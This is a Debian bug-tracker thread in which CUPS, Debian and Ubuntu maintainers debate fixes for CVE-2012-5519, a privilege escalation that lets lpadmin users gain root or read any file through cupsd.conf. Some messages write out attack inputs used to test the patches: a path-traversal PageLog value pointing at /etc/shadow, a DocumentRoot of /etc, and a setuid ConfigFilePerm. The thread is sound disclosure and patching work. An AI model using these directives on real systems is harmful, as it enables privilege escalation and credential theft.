Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Mon, 19 Nov 2012 13:00:02 GMT) Full text and rfc822 format available.

Message #76 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Yves-Alexis Perez <corsac@debian.org>, "692791@bugs.debian.org" <692791@bugs.debian.org>
Cc: Didier 'OdyX' Raboud <odyx@debian.org>, "692791@bugs.debian.org" <692791@bugs.debian.org>
Subject: Re: Bug#692791: running cupsd as root
Date: Mon, 19 Nov 2012 07:56:25 -0500
I have a fix I am testing that is going through internal review. However, since Apple software engineering is off this week (extension of Thanksgiving holiday) I don't know if I'll have sign-off until next Monday. Will post something as soon as it is available,


Sent from my iPad

On 2012-11-19, at 1:59 AM, Yves-Alexis Perez <corsac@debian.org> wrote:

> On dim., 2012-11-11 at 17:53 +0100, Didier 'OdyX' Raboud wrote:
>> Hi Michael,
>> 
>> Le dimanche, 11 novembre 2012 14.57:05, Michael Sweet a écrit :
>>> Lest we forget why we run cupsd as root, here are a few reasons:
>>> (…)
>> 
>> Thanks for the explanation.
>> 
>>> As for a proposed fix, I'm thinking we will disable the log file,
>>> RequestRoot, ServerRoot, and DocumentRoot directives in cupsd.conf, and
>>> add command line arguments in their place. That will retain
>>> configurability while eliminating this particular attack vector.
>>> 
>>> Thoughts?
>> 
>> I don't quite like the "command-line arguments" solution, as it will probably 
>> lead to more machinery on our side (variable setting in /etc/default/cups , 
>> sourcing it from /etc/init.d/cups, etc).
>> 
>> What about separating the configuration settings in two configuration files, 
>> one modifiable from the webinterface, and one only modifiable by root ? The 
>> first would contain the non-sensitive configuration settings, the latter would 
>> contain the paths, file definitions, etc. I would tend to prefer to keep 
>> configuration settings in configuration files. (But of course we'll cope with 
>> the upstream choice. :-) )
> 
> Any news on this?
> 
> -- 
> Yves-Alexis Perez
> Debian Security



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 24 Nov 2012 22:21:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Bastien ROUCARIES <roucaries.bastien@gmail.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 24 Nov 2012 22:21:06 GMT) Full text and rfc822 format available.

Message #81 received at 692791@bugs.debian.org (full text, mbox):

From: Bastien ROUCARIES <roucaries.bastien@gmail.com>
To: Martin Pitt <mpitt@debian.org>, 692791@bugs.debian.org
Subject: Last paches for cups as non root
Date: Sat, 24 Nov 2012 23:18:19 +0100
Dear martin,

Do you remember what is the last version that support non root on debian ?

Bastien



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sun, 25 Nov 2012 14:45:08 GMT) Full text and rfc822 format available.

Acknowledgement sent to Martin Pitt <mpitt@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sun, 25 Nov 2012 14:45:08 GMT) Full text and rfc822 format available.

Message #86 received at 692791@bugs.debian.org (full text, mbox):

From: Martin Pitt <mpitt@debian.org>
To: Bastien ROUCARIES <roucaries.bastien@gmail.com>
Cc: 692791@bugs.debian.org
Subject: Re: Last paches for cups as non root
Date: Sun, 25 Nov 2012 15:42:57 +0100
Bonjour Bastien,

Bastien ROUCARIES [2012-11-24 23:18 +0100]:
> Do you remember what is the last version that support non root on debian ?

It's in the changelog: It was dropped in

cupsys (1.2.12-2) unstable; urgency=low
[...]
  * Drop the derooting changes. It still has some regressions, and with
    upstream not even acknowledging the need for improving cupsys' security we
    will sit on this forever. This will be replaced by an AppArmor/SELinux
    profiles in the future.
    - Drop derooting related patches:
      06_disable_backend_setuid.dpatch
      10_external_pam_helper.dpatch
      09_runasuser.dpatch
      09_runasuser_autoconf.dpatch
    - debian/cupsys{,-client}.postinst: Drop the 'cupsys' user setup and file
      permission juggling.
    - debian/rules:
      + Drop --with-cups-user configure option.
      + Do not modify the upstream default backend permissions.
    - debian/cupsys.init.d: Do not touch log file permissions any more.
    - debian/cupsys.files: Drop cups-check-pam-auth.
    - debian/NEWS: Drop description of derooting changes.
    - debian/control: Drop adduser dependency.

I. e. 1.2.12-1 was the last version. This commit removed the
de-rooting:
http://anonscm.debian.org/gitweb/?p=pkg-cups/cups.git;a=commit;h=716cb660d85f300e687e195549adb5583fee04e0

Martin

-- 
Martin Pitt                        | http://www.piware.de
Ubuntu Developer (www.ubuntu.com)  | Debian Developer  (www.debian.org)



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Mon, 26 Nov 2012 18:57:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Mon, 26 Nov 2012 18:57:07 GMT) Full text and rfc822 format available.

Message #91 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: 692791@bugs.debian.org
Subject: Proposed patch now available...
Date: Mon, 26 Nov 2012 13:52:46 -0500
OK, I've posted proposed patches for CUPS 1.6 and trunk (1.7); patches for older versions of CUPS will be substantially similar (might be some churn due to new configuration directives)

Available at:

    http://www.cups.org/str.php?L4223

________________________________________________________________________
Michael Sweet, Senior Printing System Engineer, PWG Chair




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 11:45:04 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 11:45:05 GMT) Full text and rfc822 format available.

Message #96 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Michael Sweet <msweet@apple.com>, 692791@bugs.debian.org
Cc: team@security.debian.org
Subject: Re: Bug#692791: Proposed patch now available...
Date: Tue, 27 Nov 2012 12:45:01 +0100
[Message part 1 (text/plain, inline)]
Le lundi, 26 novembre 2012 19.52:46, Michael Sweet a écrit :
> OK, I've posted proposed patches for CUPS 1.6 and trunk (1.7); patches for
> older versions of CUPS will be substantially similar (might be some churn
> due to new configuration directives)
> 
> Available at:
> 
>     http://www.cups.org/str.php?L4223

Hi Michael, hi Debian Security Team,

I have now taken a look at the proposed upstream security fix and have merged 
it in the 1.6.1 branch, see the two commits on the pkg-cups/cups.git 
repository:

- 6026af39ea3da038c6e49226779de59520da7cc6 for the proposed patches;
- d39e6abee95f747d024f2b41970c6d7a888f0dd0 for the fixes in other patches;

Roughly, the patch splits the configuration stanzas from /etc/cups/cupsd.conf 
into two files: /etc/cups/cupsd.conf and /etc/cups/cups-files.conf. The first 
stays web-configurable and the latter can only be configured by root.

While it's a nice long-term solution for new cups installs, I'm afraid it's 
not suitable as a security hotfix (so probably not targetted at Debian testing 
nor stable): the administrator has to handle the configuration files split un 
himself. In addition to that, web-modified cupsd.conf is very likely to hinder 
the automatic configuration stanza's split.

On the longer term (for Jessie), I think web-modifiable cupsd.conf (and 
printers.conf) should be moved to /var/lib/cupsd/ and I think we should stick 
to this new cups configuration files handling.

Opinions on ways forward for Wheezy (testing) and Squeeze (stable) ?

Cheers,

OdyX
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 13:03:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 13:03:03 GMT) Full text and rfc822 format available.

Message #101 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: Proposed patch now available...
Date: Tue, 27 Nov 2012 08:00:07 -0500
Didier,

On 2012-11-27, at 6:45 AM, Didier 'OdyX' Raboud <odyx@debian.org> wrote:
> ...
> While it's a nice long-term solution for new cups installs, I'm afraid it's 
> not suitable as a security hotfix (so probably not targetted at Debian testing 
> nor stable): the administrator has to handle the configuration files split un 
> himself. In addition to that, web-modified cupsd.conf is very likely to hinder 
> the automatic configuration stanza's split.

A package update can lay down a new cups-files.conf, and it shouldn't be hard to do a short migration script that copies the dozen or so affected directives from cupsd.conf to the new cups-files.conf file.  I guess it just depends on whether you want to close this particular hole and how you want to deal with it.

CUPS 1.6.2 will ship with the split configuration files and a warning to error_log when the cupsd.conf file contains directives that should be moved.

A simpler (but less complete) fix for CUPS 1.5.x and earlier would be to blacklist /etc and /dev for the logs - we wanted something more complete.

> On the longer term (for Jessie), I think web-modifiable cupsd.conf (and 
> printers.conf) should be moved to /var/lib/cupsd/ and I think we should stick 
> to this new cups configuration files handling.

Back in the day when we were adapting CUPS to the FHS (1.0, 2.0? I don't remember) we decided not to use /var/lib because /etc is the place for editable configuration files and /var/lib is the place for files that are managed by software.  printers.conf, classes.conf, and cupsd.conf *are* user-editable files (even if that isn't the typical case for classes.conf and printers.conf). *If* we move to a non-editable format in the future (likely for CUPS 2.0) we will definitely restructure things to put those files in /var/lib.

I don't advise that you try to patch current CUPS to use /var/lib/cupsd for cupsd stuff and /etc/cups for everything else since the current code assumes that all CUPS configuration files are in one location.  The patch will be very very messy and hard to maintain.

__________________________________________________
Michael Sweet, Senior Printing System Engineer, PWG Chair




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 13:45:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 13:45:03 GMT) Full text and rfc822 format available.

Message #106 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Michael Sweet <msweet@apple.com>
Cc: 692791@bugs.debian.org, team@security.debian.org
Subject: Re: Bug#692791: Proposed patch now available...
Date: Tue, 27 Nov 2012 14:42:36 +0100
[Message part 1 (text/plain, inline)]
Le mardi, 27 novembre 2012 14.00:07, Michael Sweet a écrit :
> A package update can lay down a new cups-files.conf, and it shouldn't be
> hard to do a short migration script that copies the dozen or so affected
> directives from cupsd.conf to the new cups-files.conf file.  I guess it
> just depends on whether you want to close this particular hole and how you
> want to deal with it.

Exactly. I'll investigate the idea of scripting the configuration files 
upgrade (probably using ucf). The point is that it's not the type of changes 
we particularily welcome in stable releases.

> CUPS 1.6.2 will ship with the split configuration files and a warning to
> error_log when the cupsd.conf file contains directives that should be
> moved.
> 
> A simpler (but less complete) fix for CUPS 1.5.x and earlier would be to
> blacklist /etc and /dev for the logs - we wanted something more complete.

Sure. As mentionned, for the long-term the chosen solution is the correct one. 
Yet we need something as undisruptive and safe as possible for our stable 
release.

> > On the longer term (for Jessie), I think web-modifiable cupsd.conf (and
> > printers.conf) should be moved to /var/lib/cupsd/ and I think we should
> > stick to this new cups configuration files handling.
> 
> Back in the day when we were adapting CUPS to the FHS (1.0, 2.0? I don't
> remember) we decided not to use /var/lib because /etc is the place for
> editable configuration files and /var/lib is the place for files that are
> managed by software.  printers.conf, classes.conf, and cupsd.conf *are*
> user-editable files (even if that isn't the typical case for classes.conf
> and printers.conf). *If* we move to a non-editable format in the future
> (likely for CUPS 2.0) we will definitely restructure things to put those
> files in /var/lib.
> 
> I don't advise that you try to patch current CUPS to use /var/lib/cupsd for
> cupsd stuff and /etc/cups for everything else since the current code
> assumes that all CUPS configuration files are in one location.  The patch
> will be very very messy and hard to maintain.

Sure, thanks for the detailed response. Over lunch I realised pushing 
cupsd.conf to /var/lib/cupsd would indeed be a bad idea.

Cheers,

OdyX
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 14:33:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marc Deslauriers <marc.deslauriers@canonical.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 14:33:03 GMT) Full text and rfc822 format available.

Message #111 received at 692791@bugs.debian.org (full text, mbox):

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: 692791@bugs.debian.org
Subject: Re: members of lpadmin can read every file on server via cups
Date: Tue, 27 Nov 2012 09:30:46 -0500
[Message part 1 (text/plain, inline)]
FYI, as a security fix for our stable releases in Ubuntu, we plan on
disabling cupsd.conf modification in the web interface entirely.
Attached is the patch we plan on using.

Marc.
[CVE-2012-5519.patch (text/x-patch, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 21:06:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 21:06:03 GMT) Full text and rfc822 format available.

Message #116 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Marc Deslauriers <marc.deslauriers@canonical.com>, 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Tue, 27 Nov 2012 21:51:31 +0100
[Message part 1 (text/plain, inline)]
Le mardi, 27 novembre 2012 15.30:46, Marc Deslauriers a écrit :
> FYI, as a security fix for our stable releases in Ubuntu, we plan on
> disabling cupsd.conf modification in the web interface entirely.
> Attached is the patch we plan on using.

Hi Marc,

while testing your patch I noticed it was not masking the "Edit Configuration 
File" input button in all locales (found in templates/*/admin.tmpl in 1.5.3).

Updated patch is attached.

Cheers,

OdyX
[CVE-2012-5519.patch (text/x-patch, attachment)]

Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 21:12:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marc Deslauriers <marc.deslauriers@canonical.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 21:12:03 GMT) Full text and rfc822 format available.

Message #121 received at 692791@bugs.debian.org (full text, mbox):

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Tue, 27 Nov 2012 16:10:11 -0500
On 12-11-27 03:51 PM, Didier 'OdyX' Raboud wrote:
> Le mardi, 27 novembre 2012 15.30:46, Marc Deslauriers a écrit :
>> FYI, as a security fix for our stable releases in Ubuntu, we plan on
>> disabling cupsd.conf modification in the web interface entirely.
>> Attached is the patch we plan on using.
> 
> Hi Marc,
> 
> while testing your patch I noticed it was not masking the "Edit Configuration 
> File" input button in all locales (found in templates/*/admin.tmpl in 1.5.3).
> 
> Updated patch is attached.
> 

Ah! thanks for that, I completely overlooked the localized template files.

Marc.





Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Tue, 27 Nov 2012 22:18:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Tue, 27 Nov 2012 22:18:03 GMT) Full text and rfc822 format available.

Message #126 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>, "692791@bugs.debian.org" <692791@bugs.debian.org>
Cc: Marc Deslauriers <marc.deslauriers@canonical.com>, "692791@bugs.debian.org" <692791@bugs.debian.org>
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Tue, 27 Nov 2012 17:14:21 -0500
Note: disabling he web interface is not enough, you also need to disable HTTP PUT in cupsd, which takes care of cupsctl too. However, since that also disables helpful things like changing the log level you might want to reconsider fixing things that way...


Sent from my iPad

On 2012-11-27, at 3:51 PM, Didier 'OdyX' Raboud <odyx@debian.org> wrote:

> Le mardi, 27 novembre 2012 15.30:46, Marc Deslauriers a écrit :
>> FYI, as a security fix for our stable releases in Ubuntu, we plan on
>> disabling cupsd.conf modification in the web interface entirely.
>> Attached is the patch we plan on using.
> 
> Hi Marc,
> 
> while testing your patch I noticed it was not masking the "Edit Configuration 
> File" input button in all locales (found in templates/*/admin.tmpl in 1.5.3).
> 
> Updated patch is attached.
> 
> Cheers,
> 
> OdyX
> <CVE-2012-5519.patch>



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Wed, 28 Nov 2012 04:45:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Wed, 28 Nov 2012 04:45:03 GMT) Full text and rfc822 format available.

Message #131 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Marc Deslauriers <marc.deslauriers@canonical.com>, 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Tue, 27 Nov 2012 23:38:58 -0500
[Message part 1 (text/plain, inline)]
After looking at this patch in detail, it doesn't actually prevent users in the lpadmin group from modifying cupsd.conf and performing the specified privilege escalation.

An alternate fix for cups-1.5 and earlier that specifically addresses the reported problem by requiring the log files to reside in CUPS_LOGDIR:

[alt-CVE-2012-5519.patch (application/octet-stream, attachment)]
[Message part 3 (text/plain, inline)]

On 2012-11-27, at 9:30 AM, Marc Deslauriers <marc.deslauriers@canonical.com> wrote:

> FYI, as a security fix for our stable releases in Ubuntu, we plan on
> disabling cupsd.conf modification in the web interface entirely.
> Attached is the patch we plan on using.
> 
> Marc.
> <CVE-2012-5519.patch>

________________________________________________________________________
Michael Sweet, Senior Printing System Engineer, PWG Chair


Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Wed, 28 Nov 2012 09:57:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Wed, 28 Nov 2012 09:57:06 GMT) Full text and rfc822 format available.

Message #136 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Michael Sweet <msweet@apple.com>, 692791@bugs.debian.org
Cc: Marc Deslauriers <marc.deslauriers@canonical.com>
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Wed, 28 Nov 2012 10:54:41 +0100
Le mercredi, 28 novembre 2012 05.38:58, Michael Sweet a écrit :
> After looking at this patch in detail, it doesn't actually prevent users in
> the lpadmin group from modifying cupsd.conf and performing the specified
> privilege escalation.
> 
> An alternate fix for cups-1.5 and earlier that specifically addresses the
> reported problem by requiring the log files to reside in CUPS_LOGDIR:

Indeed, thanks. BUT, as far as I can test, this patch lets some potential 
attacks open, such as setting DocumentRoot to /etc (then access 
http://localhost:631/shadow …). With some imagination, you could set 
SystemGroup to "lpadmin other-group", granting cups administration rights to 
"other-group", etc.

At least DocumentRoot has to be constrained to stay what the package says it 
is IMHO.

Cheers,

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Wed, 28 Nov 2012 11:45:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Michael Sweet <msweet@apple.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Wed, 28 Nov 2012 11:45:03 GMT) Full text and rfc822 format available.

Message #141 received at 692791@bugs.debian.org (full text, mbox):

From: Michael Sweet <msweet@apple.com>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: "692791@bugs.debian.org" <692791@bugs.debian.org>, Marc Deslauriers <marc.deslauriers@canonical.com>
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Wed, 28 Nov 2012 06:41:27 -0500
Didier,

Indeed, we can add additional directory checks to the "simple" fix, or for purposes of the Debian packages just disable certain directives if they should not be configured from their defaults.

WRT setting SystemGroup, that /is/ a valid configuration change that some sites make; disabling that directive might break some sites, but at least they can tweak their policy sections to grant printer admin rights as a workaround?

Seems like maybe the simplest fix is to disable the problematic directives (just use defaults); sites that need to change from the defaults can install their own versions of the cups packages. Thoughts?


Sent from my iPad

On 2012-11-28, at 4:54 AM, Didier 'OdyX' Raboud <odyx@debian.org> wrote:

> Le mercredi, 28 novembre 2012 05.38:58, Michael Sweet a écrit :
>> After looking at this patch in detail, it doesn't actually prevent users in
>> the lpadmin group from modifying cupsd.conf and performing the specified
>> privilege escalation.
>> 
>> An alternate fix for cups-1.5 and earlier that specifically addresses the
>> reported problem by requiring the log files to reside in CUPS_LOGDIR:
> 
> Indeed, thanks. BUT, as far as I can test, this patch lets some potential 
> attacks open, such as setting DocumentRoot to /etc (then access 
> http://localhost:631/shadow …). With some imagination, you could set 
> SystemGroup to "lpadmin other-group", granting cups administration rights to 
> "other-group", etc.
> 
> At least DocumentRoot has to be constrained to stay what the package says it 
> is IMHO.
> 
> Cheers,
> 
> OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Wed, 28 Nov 2012 11:57:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Wed, 28 Nov 2012 11:57:04 GMT) Full text and rfc822 format available.

Message #146 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Michael Sweet <msweet@apple.com>
Cc: "692791@bugs.debian.org" <692791@bugs.debian.org>, Marc Deslauriers <marc.deslauriers@canonical.com>
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Wed, 28 Nov 2012 12:58:08 +0100
Le mercredi, 28 novembre 2012 12.41:27, Michael Sweet a écrit :
> Indeed, we can add additional directory checks to the "simple" fix, or for
> purposes of the Debian packages just disable certain directives if they
> should not be configured from their defaults.

Sure; sounds good.

> WRT setting SystemGroup, that /is/ a valid configuration change that some
> sites make; disabling that directive might break some sites, but at least
> they can tweak their policy sections to grant printer admin rights as a
> workaround?

I feel it's not quite OK to let root delegate rights to a group (lpadmin in 
our case) that can then extend these rights to any other group (even one they 
are not part of).

I'm not to say root shouldn't be allowed to grant SystemGroup rights to any 
group he wants through /etc/cups/cupsd.conf , but I'm really uncomfortable 
letting lpadmin users (whose primary right is the right to add printers as far 
as I understand it) do this through the webinterface.

> Seems like maybe the simplest fix is to disable the problematic directives
> (just use defaults); sites that need to change from the defaults can
> install their own versions of the cups packages. Thoughts?

DocumentRoot has to be fixed that way IMHO as the attack is immediate and I 
think it's a suitable fix for our stable releases. For SystemGroup, I think 
it's reasonably okay to leave that bug open for stable releases; the long-term 
fix (to push that to cups-files.conf) is okay in that regard.

Any idea/patch on how you'd enforce default DocumentRoot (including making 
sure the tests still run? )?

Cheers,

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Wed, 28 Nov 2012 14:03:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marc Deslauriers <marc.deslauriers@canonical.com>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Wed, 28 Nov 2012 14:03:03 GMT) Full text and rfc822 format available.

Message #151 received at 692791@bugs.debian.org (full text, mbox):

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: Michael Sweet <msweet@apple.com>
Cc: 692791@bugs.debian.org
Subject: Re: Bug#692791: members of lpadmin can read every file on server via cups
Date: Wed, 28 Nov 2012 09:00:54 -0500
On 12-11-27 11:38 PM, Michael Sweet wrote:
> After looking at this patch in detail, it doesn't actually prevent users in the lpadmin group from modifying cupsd.conf and performing the specified privilege escalation.
> 
> An alternate fix for cups-1.5 and earlier that specifically addresses the reported problem by requiring the log files to reside in CUPS_LOGDIR:
> 

Thanks for taking a look at it Michael. I now see what you meant by
needing to disable HTTP PUT in cupsd.

So, your alternate fix doesn't actually solve the problem as I can still
do something like:

PageLog /var/log/cups/../../../etc/shadow

Also, there are a lot of other directives that can pretty trivially
escalate to root...for example, setting ConfigFilePerm to 04777...

I'm starting to think that migrating stable releases to the dual config
files, while pretty intrusive, is something we need to consider...

Marc.




Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Thu, 29 Nov 2012 10:30:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Thu, 29 Nov 2012 10:30:06 GMT) Full text and rfc822 format available.

Message #156 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org
Cc: Marc Deslauriers <marc.deslauriers@canonical.com>, Michael Sweet <msweet@apple.com>, team@security.debian.org, debian-release@lists.debian.org
Subject: #692791 - CVE-2012-5519 - cups lpadmin-to-root privilege escalation - Proposed solutions
Date: Thu, 29 Nov 2012 11:30:25 +0100
[Message part 1 (text/plain, inline)]
Hi all,
(Security and Release Teams CC'ed to get their advice)

As this is now going in several directions, let's try to summarize the
proposed solutions to get this privilege escalation fixed.

A) Move configuration stanzas from cupsd.conf to cups-files.conf

This is the patch at [0], from upstream revisions 10710 and 10713 and Marc's
small-fixes patch on STR-4223.

This patch moves the following configuration settings from cupsd.conf to
cups-files.conf:

 AccessLog	CacheDir		ConfigFilePerm	DataDir		DocumentRoot
 ErrorLog		FileDevice	FontPath			LogFilePerm	LPDConfigFile
 PageLog		PrintCap		RemoteRoot		RequestRoot	ServerBin
 ServerCertificate			ServerKey			ServerRoot	SMBConfigFile
 StateDir 	SystemGroupAuthKey				TempDir		Pidfile

Amongst thoses, only SystemGroup was defined in the default cupsd.conf (and
Pidfile is Debian-specific). cups-files.conf is not editable by lpadmin users,
and not from the webinterface. As far as I read and understand the patch, the
above list of configuration stanzas "just" generate warnings if they are found
in cupsd.conf.

Pros: + That's the correct long-term solution.
Cons: - Far from easy to migrate automatically, especially when cupsd.conf was
        edited through the webinterface automagically.
      - If putting these configuration stanzas in cupsd.conf just generates
        warnings, what's the point of the exercise?

B) Disable any remote configuration by lpadmin users

This has been attempted by Marc on [1]. For now, it is incomplete as it still
allows lpadmin users to HTTP PUT updates to the configuration files.

Pros: + Addresses the problem in a way less intrusive way (smaller patch)
Cons: - Big loss of functionality through forbidding any lpadmin cups server
        configuration

C) Ensure that logfiles paths are under CUPSD_LOGDIR /var/log/cups

This has been attempted by Michael on [2]. For now, it is proven to be too
weak as it lets attackers use /var/log/cups/../../../etc/shadow e.g. Also it
only checks the logfiles paths (and not DocumentRoot e.g.).

Pros: + Avoids the simple attack
Cons: - Doesn't really solve anything

D) Enforce default paths, override configuration settings

This has been presented as a possible solution: override the user configuration
settings with sane defaults.

Pros: + Avoids all possible attacks given sane defaults
Cons: - Breaks the test-suite that needs to redirect logfiles, DocumentRoot,
        etc.
      - Takes configuration freedom away from administrators;
      - On upgrade, doesn't respect past configurations by administrators;

== Conclusion

In my opinion, A) is the correct long-term solution. It still needs some
additional scripting (move to ucf for cupsd.conf, preinst to move away what's
easily moved away, postinst to edit the new cups-files.conf with old values
from cupsd.conf. But this is probably way too intrusive for a stable upgrade.
Even for a fix targetted at testing, I suspect that this might be too
intrusive (+ the configuration file edit dance isn't written yet).

So, for squeeze/stable and wheezy/next-stable, I'd be tempted to go the B)
(to be fixed) way. Granted, we'll loose functionality, but it will put us on
the safe-side, with updates that drop functionality without needing a painful
configuration-files-edit upgrading path.

Opinions?

Cheers,

OdyX

[0] http://anonscm.debian.org/gitweb/?p=pkg-cups/cups.git;a=blob;f=debian/patches/Split-configuration-files-STR-4223.patch
[1] http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=116;filename=CVE-2012-5519.patch;att=1;bug=692791
